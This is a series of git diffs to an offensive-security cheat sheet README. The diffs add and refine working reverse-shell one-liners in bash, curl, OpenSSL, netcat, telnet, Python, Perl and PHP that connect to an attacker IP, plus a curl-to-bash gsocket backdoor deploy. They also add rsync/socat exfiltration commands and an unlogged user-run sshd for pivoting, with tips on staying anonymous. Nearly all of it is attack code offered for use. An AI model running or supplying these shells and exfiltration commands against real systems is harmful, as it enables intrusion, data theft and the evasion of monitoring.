deletions(-) diff --git a/README.md b/README.md index 2dcc7c8..515af05 100644 --- a/README.md +++ b/README.md @@ -51,9 +51,9 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Reverse Shells](#reverse-shell) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) - 2. [with cURL](#curlshell) - 1. [without Bash](#reverse-shell-no-bash) - 1. [with remote.moe](#revese-shell-remote-moe) + 2. [with cURL (encrypted)](#curlshell) + 1. [without /dev/tcp](#reverse-shell-no-bash) + 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -1113,7 +1113,7 @@ bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' ``` -**5.i.c. Reverse shell with cURL** +**5.i.c. Reverse shell with cURL (encrypted)** Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited: ```sh @@ -1128,7 +1128,7 @@ curl -skfL https://1.2.3.4:8080 | bash ``` -**5.i.d. Reverse shell without Bash** +**5.i.d. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -1140,6 +1140,11 @@ nc -e /bin/bash -vn 3.13.3.7 1524 Variant if *'-e'* is not supported: ```sh +{ nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : +``` + +Variant for older */bin/sh*: +```sh mkfifo /tmp/.io sh -i 2>&1 /tmp/.io ``` @@ -1152,14 +1157,13 @@ sh -i 2>&1 /tmp/.io Telnet variant when mkfifo is not supported (Ulg!): ```sh -(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) & -tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio +({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ) +tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio ``` -Note: Use */tmp/.fio* if */dev/shm* is not available. -Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. +Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.e. Reverse shell with remote.moe and ssh** +**5.i.e. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): From c72140ec7608f69c40052412caa504fc7f5a2f64 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:19:31 +0100 Subject: [PATCH 24/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 515af05..288b537 100644 --- a/README.md +++ b/README.md @@ -1135,7 +1135,7 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work On the remote system: ```sh -nc -e /bin/bash -vn 3.13.3.7 1524 +nc -e /bin/sh -vn 3.13.3.7 1524 ``` Variant if *'-e'* is not supported: From 110630ef4044c8c5be0104fdf8cd7084dca95fac Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:28:50 +0100 Subject: [PATCH 25/56] Update README.md --- README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 288b537..1801cf4 100644 --- a/README.md +++ b/README.md @@ -52,8 +52,9 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) - 1. [without /dev/tcp](#reverse-shell-no-bash) + 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) + 1. [without /dev/tcp](#reverse-shell-no-bash) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -1124,11 +1125,25 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3 ``` ```sh # On the target: -curl -skfL https://1.2.3.4:8080 | bash +curl -skfL https://3.13.3.7:8080 | bash +``` + + +**5.i.d. Reverse shell with OpenSSL (encrypted)** + +```sh +# Generate SSL keys: +openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" +# Start your listening server: +openssl s_server -port 1524 -cert cert.pem -key key.pem +``` +```sh +# On the target: +{ openssl s_client -connect 3.13.3.7:1524 -quiet &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` -**5.i.d. Reverse shell without /dev/tcp** +**5.i.e. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -1163,7 +1178,7 @@ tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.e. Reverse shell with remote.moe and ssh (encrypted)** +**5.i.f. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1190,13 +1205,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.f. Reverse shell with Python** +**5.i.g. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.g. Reverse shell with Perl** +**5.i.h. Reverse shell with Perl** ```sh # method 1 From 0b3c8f7c7bb2da5d6bdeab61c847bd50c1d97251 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:29:22 +0100 Subject: [PATCH 26/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1801cf4..db01186 100644 --- a/README.md +++ b/README.md @@ -1220,7 +1220,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.h. Reverse shell with PHP** +**5.i.i. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From cef76541ee81381fc3f9c3800f9b705e0f984bde Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:33:55 +0100 Subject: [PATCH 27/56] Update README.md --- README.md | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index db01186..d956c3c 100644 --- a/README.md +++ b/README.md @@ -49,7 +49,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [File transfer to Telegram](#tg) 1. [Reverse Shell / Dumb Shell](#reverse-shell) 1. [Reverse Shells](#reverse-shell) - 1. [with gs-netcat](#reverse-shell-gs-netcat) + 1. [with gs-netcat (encrypted)](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) 3. [with OpenSSL (encrypted)](#sslshell) @@ -1080,20 +1080,21 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu ## 5. Reverse Shell / Dumb Shell -**5.i.a. Reverse shell with gs-netcat** +**5.i.a. Reverse shell with gs-netcat (encrypted)** Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :> ```sh -gs-netcat -s MySecret -l -i # Host +X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)" +# or X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- https://gsocket.io/x)" ``` -Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed. To connect to the shell from your workstation: ```sh -gs-netcat -s MySecret -i +S=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)" +# or gs-netcat -s ExampleSecretChangeMe -i +# Add -T to tunnel through TOR ``` -Use -T to tunnel trough TOR. **5.i.b. Reverse shell with Bash** From 83097ef44b548991a42830c49350988da1283fe8 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:42:24 +0100 Subject: [PATCH 28/56] Update README.md --- README.md | 25 +++++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index d956c3c..5bd3d32 100644 --- a/README.md +++ b/README.md @@ -52,6 +52,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [with gs-netcat (encrypted)](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) + 2. [with cURL (cleartext)](#curltelnet) 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [without /dev/tcp](#reverse-shell-no-bash) @@ -1129,8 +1130,20 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3 curl -skfL https://3.13.3.7:8080 | bash ``` + +**5.i.d Reverse shell with cURL (cleartext)** + +Start ncat to listen for multiple connections: +```sh +ncat -kl 1524 +``` +```sh +# On the target: +C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/null +``` + -**5.i.d. Reverse shell with OpenSSL (encrypted)** +**5.i.e. Reverse shell with OpenSSL (encrypted)** ```sh # Generate SSL keys: @@ -1144,7 +1157,7 @@ openssl s_server -port 1524 -cert cert.pem -key key.pem ``` -**5.i.e. Reverse shell without /dev/tcp** +**5.i.f. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -1179,7 +1192,7 @@ tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.f. Reverse shell with remote.moe and ssh (encrypted)** +**5.i.g. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1206,13 +1219,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.g. Reverse shell with Python** +**5.i.h. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.h. Reverse shell with Perl** +**5.i.i. Reverse shell with Perl** ```sh # method 1 @@ -1221,7 +1234,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.i. Reverse shell with PHP** +**5.i.j. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From a56a62d38df5d02930fe5b2238451a7a6a01c394 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:45:17 +0100 Subject: [PATCH 29/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5bd3d32..0aa58b9 100644 --- a/README.md +++ b/README.md @@ -1135,7 +1135,7 @@ curl -skfL https://3.13.3.7:8080 | bash Start ncat to listen for multiple connections: ```sh -ncat -kl 1524 +ncat -kltv 1524 ``` ```sh # On the target: From 2d4b56c0965e7bce067978acda717c1c95f59e12 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 08:58:51 +0100 Subject: [PATCH 30/56] Update README.md --- README.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 0aa58b9..0578e10 100644 --- a/README.md +++ b/README.md @@ -1172,21 +1172,22 @@ Variant if *'-e'* is not supported: { nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` +* On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). +* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Soalris) or Korn shell (AIX). Use `mkfifo` instead. + Variant for older */bin/sh*: ```sh -mkfifo /tmp/.io -sh -i 2>&1 /tmp/.io +mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io ``` Telnet variant: ```sh -mkfifo /tmp/.io -sh -i 2>&1 /tmp/.io +mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io ``` Telnet variant when mkfifo is not supported (Ulg!): ```sh -({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ) +({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ); tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio ``` Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. From f1ed9e984fca6d3aa929196d1cc493c98655fe3c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 09:02:26 +0100 Subject: [PATCH 31/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0578e10..8206203 100644 --- a/README.md +++ b/README.md @@ -1173,7 +1173,7 @@ Variant if *'-e'* is not supported: ``` * On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). -* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Soalris) or Korn shell (AIX). Use `mkfifo` instead. +* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead. Variant for older */bin/sh*: ```sh From a7e4f2078cfbfdd51930778063942a2a01afafea Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 09:06:20 +0100 Subject: [PATCH 32/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8206203..4a30392 100644 --- a/README.md +++ b/README.md @@ -1172,7 +1172,7 @@ Variant if *'-e'* is not supported: { nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` -* On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). +* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 &1|:`. (*thanks IA_PD*). * The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead. Variant for older */bin/sh*: From f240f9374fb34b30e5693f4cc83138d7d9b76556 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 11:19:37 +0100 Subject: [PATCH 33/56] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4a30392..aac3248 100644 --- a/README.md +++ b/README.md @@ -1187,10 +1187,9 @@ mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io Telnet variant when mkfifo is not supported (Ulg!): ```sh -({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ); -tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio +touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio ``` -Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. +Note: Dont forget to `rm /tmp/.fio` after login. **5.i.g. Reverse shell with remote.moe and ssh (encrypted)** From 4abd6ec96ddd6a74861d869e5c7dd7649b4b21ae Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 11:34:59 +0100 Subject: [PATCH 34/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index aac3248..defba75 100644 --- a/README.md +++ b/README.md @@ -432,7 +432,7 @@ tcpdump -n "tcp[tcpflags] == tcp-syn" tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ## Ascii output (for all large packets. Change to >40 if no TCP options are used). -tcpdump -s 2048 -nAq 'tcp and (ip[2:2] > 60)' +tcpdump -s0 -nAq 'tcp and (ip[2:2] > 60)' ``` From ef8f679e0e14698735e0a4a82048068f9db63477 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 13:47:07 +0100 Subject: [PATCH 35/56] Update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index defba75..c7f75d3 100644 --- a/README.md +++ b/README.md @@ -1008,19 +1008,19 @@ Receiver: ```posh openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt cat ssl.key ssl.crt >ssl.pem -rm -f ssl.key +rm -f ssl.key ssl.crt mkdir upload -socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.crt EXEC:"rsync --server -logtprR --safe-links --partial upload" +socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsync --server -logtprR --safe-links --partial upload" ``` Sender: ```posh -# Copy the ssl.pem and ssl.crt from the Receiver to the Sender: +# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez' # Using rsync + socat-ssl -rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.crt,verify=0' #" -- warez 0: +rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0: # Using rsync + openssl -rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.crt -quiet 2>/dev/null' #" -- warez 0: +rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0: ``` Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). From 6b4fd5496040f643172bd2a0053487dc427c8c6f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 18:52:31 +0100 Subject: [PATCH 36/56] Update README.md --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c7f75d3..2dcd4b3 100644 --- a/README.md +++ b/README.md @@ -1931,10 +1931,11 @@ rlwrap --always-readline ssh user@host 4. [HTB absolute](https://0xdf.gitlab.io/2023/05/27/htb-absolute.html) - Well written and explained attack. 5. [Conti Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) - Windows hacking. Pragmatic. 6. [Red Team Notes](https://www.ired.team/) -7. [HackTricks](https://book.hacktricks.xyz/welcome/readme) -8. [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) -9. [VulHub](https://github.com/vulhub/vulhub) - Test your exploits -10. [Qubes-OS](https://www.qubes-os.org/) - Desktop OS focused on security with XEN isolated (disposable) guest VMs (Fedora, Debian, Whonix out of the box) +7. [InfoSec CheatSheet](https://github.com/r1cksec/cheatsheets) +8. [HackTricks](https://book.hacktricks.xyz/welcome/readme) +9. [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) +10. [VulHub](https://github.com/vulhub/vulhub) - Test your exploits +11. [Qubes-OS](https://www.qubes-os.org/) - Desktop OS focused on security with XEN isolated (disposable) guest VMs (Fedora, Debian, Whonix out of the box) --- From b8ba706d18a1548235ba33aac06ca4c3e5b4f6d3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 15:25:58 +0100 Subject: [PATCH 37/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2dcd4b3..bde54a0 100644 --- a/README.md +++ b/README.md @@ -619,7 +619,7 @@ nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme. hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt ``` -Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). +Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/). **3.xi. Brute Force Passwords / Keys** From acfb6fec93443ddd7813c48751bb3f89e10714c3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 20:56:26 +0100 Subject: [PATCH 38/56] Update README.md --- README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/README.md b/README.md index bde54a0..a2b9842 100644 --- a/README.md +++ b/README.md @@ -24,6 +24,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [SSH socks5 tunnel](#ssh-socks-tunnel) 1. [SSH to NATed host](#ssh-j) 1. [SSH pivot via ProxyJump](#ssh-pj) + 1. [SSHD as user](#sshd-user) 1. [Network](#network) 1. [Discover hosts](#discover) 1. [Tcpdump](#tcpdump) @@ -404,6 +405,23 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135 > We use this as well to hide our IP address when logging into servers. + +**2.vi SSHD as user land** + +It is possible to start another SSHD on any port as non-root user and use this for connection multiplexing or forwarding (and without logging): +```sh +# On the server, as non-root user 'joe': +mkdir -p ~/.ssh 2>/dev/null +ssh-keygen -q -N "" -t ed25519 -f sshd_key +cat sshd_key.pub >>~/.ssh/authorized_keys +cat sshd_key +$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv +``` +```sh +# On the client, copy the sshd_key from the server: +ssh -i sshd_key -p 31337 joe@1.2.3.4 +``` + --- ## 3. Network From 9f15bd008ef1f37126ec8e03e9695b06941c4757 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:03:48 +0100 Subject: [PATCH 39/56] Update README.md --- README.md | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a2b9842..2b3213d 100644 --- a/README.md +++ b/README.md @@ -408,7 +408,7 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135 **2.vi SSHD as user land** -It is possible to start another SSHD on any port as non-root user and use this for connection multiplexing or forwarding (and without logging): +It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing): ```sh # On the server, as non-root user 'joe': mkdir -p ~/.ssh 2>/dev/null @@ -418,10 +418,14 @@ cat sshd_key $(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv ``` ```sh -# On the client, copy the sshd_key from the server: -ssh -i sshd_key -p 31337 joe@1.2.3.4 +# On the client, copy the sshd_key from the server +# and proxy connection via the server: +ssh -D1080 -i sshd_key -p 31337 joe@1.2.3.4 +# curl -x socks5h://0 ipinfo.io ``` +[SSF](https://securesocketfunneling.github.io/ssf/#home) is an alternative way to multiplex TCP over TLS. + --- ## 3. Network From 22c694d5d0143b0850a85fc83ea42cdddc572535 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:08:48 +0100 Subject: [PATCH 40/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 2b3213d..59e92c4 100644 --- a/README.md +++ b/README.md @@ -415,12 +415,12 @@ mkdir -p ~/.ssh 2>/dev/null ssh-keygen -q -N "" -t ed25519 -f sshd_key cat sshd_key.pub >>~/.ssh/authorized_keys cat sshd_key -$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv +$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv ``` ```sh # On the client, copy the sshd_key from the server -# and proxy connection via the server: -ssh -D1080 -i sshd_key -p 31337 joe@1.2.3.4 +# and proxy connection via the server and forward 31339 to localhsot: +ssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4 # curl -x socks5h://0 ipinfo.io ``` From ce5801f6ed8505f2994f68aa6b693b5617ac6f3a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:10:05 +0100 Subject: [PATCH 41/56] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 59e92c4..7dbb930 100644 --- a/README.md +++ b/README.md @@ -418,8 +418,8 @@ cat sshd_key $(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv ``` ```sh -# On the client, copy the sshd_key from the server -# and proxy connection via the server and forward 31339 to localhsot: +# On the client, copy the sshd_key from the server. Then login: +# Example: Proxy connection via the server and reverse-forward 31339 to localhost: ssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4 # curl -x socks5h://0 ipinfo.io ``` From 870214a40be6b27577d1b573e9fcdd87587fee43 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 23 Oct 2023 21:42:17 +0100 Subject: [PATCH 42/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7dbb930..e2834b8 100644 --- a/README.md +++ b/README.md @@ -1798,6 +1798,7 @@ Many other services (for free) Comms 1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send & receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services])). 1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only. +2. [tuta.io](https://tuta.io) or [ProtonMail](https://pm.me)/[.onion](https://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/) - Free & Private email 1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)). 1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/)) 2. [List of "No KYC" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) From 